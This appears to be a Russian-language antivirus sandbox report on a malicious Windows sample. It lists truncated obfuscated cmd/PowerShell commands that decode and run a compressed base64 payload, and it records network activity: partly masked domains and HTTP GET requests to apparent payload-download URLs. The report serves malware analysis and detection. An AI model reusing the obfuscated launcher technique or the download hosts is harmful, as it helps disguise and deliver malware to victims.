Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' <SYSTEM32>\CmD.EXe /C "SeT OxnHJ= ^& ((GV '*MDr*').nAme[3,11,2]-joiN'') ( NEW-oBjEcT Io.sTReaMReadeR((NEW-oBjEcT Io.cOMPresSIon.dEFLaTESTreAm([iO.mEmoRYSTREam] [syStEm.conVeRt]::FroMBasE6...
Сетевая активность
Подключается к
- 'tl###reme.com':80
- 'va####reweghen.be':80
- 'ca#####ch-software.ch':80
- 'ca####sch-ag.com':443
- 'tz##2.com':80
- 'tz##2.com':443
TCP
Запросы HTTP GET
- http://tl###reme.com/orsOyz
- http://va####reweghen.be/I
- http://www.ca#####ch-software.ch/ynlTz
- http://www.tz##2.com/wp-content/8xR
Другие
- 'ca####sch-ag.com':443
- 'tz##2.com':443
UDP
- DNS ASK tl###reme.com
- DNS ASK va####reweghen.be
- DNS ASK ca#####ch-software.ch
- DNS ASK ca####sch-ag.com
- DNS ASK sh####.chancemkt.com
- DNS ASK tz##2.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' <SYSTEM32>\CmD.EXe /C "SeT OxnHJ= ^& ((GV '*MDr*').nAme[3,11,2]-joiN'') ( NEW-oBjEcT Io.sTReaMReadeR((NEW-oBjEcT Io.cOMPresSIon.dEFLaTESTreAm([iO.mEmoRYSTREam] [syStEm.conVeRt]::FroMBasE6...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' sET-IteM vAriAbLe:j1R9x ( [Type](\"{0}{1}{3}{2}\"-F 'EN','viR','ENt','ONM' )) ; ( ( geT-VaRIABlE J1r9X ).vAlUE::( \"{0}{5}{2}{3}{6}{4}{1}\" -f 'get','abLE','i','RONm','tVari','ENv','EN...
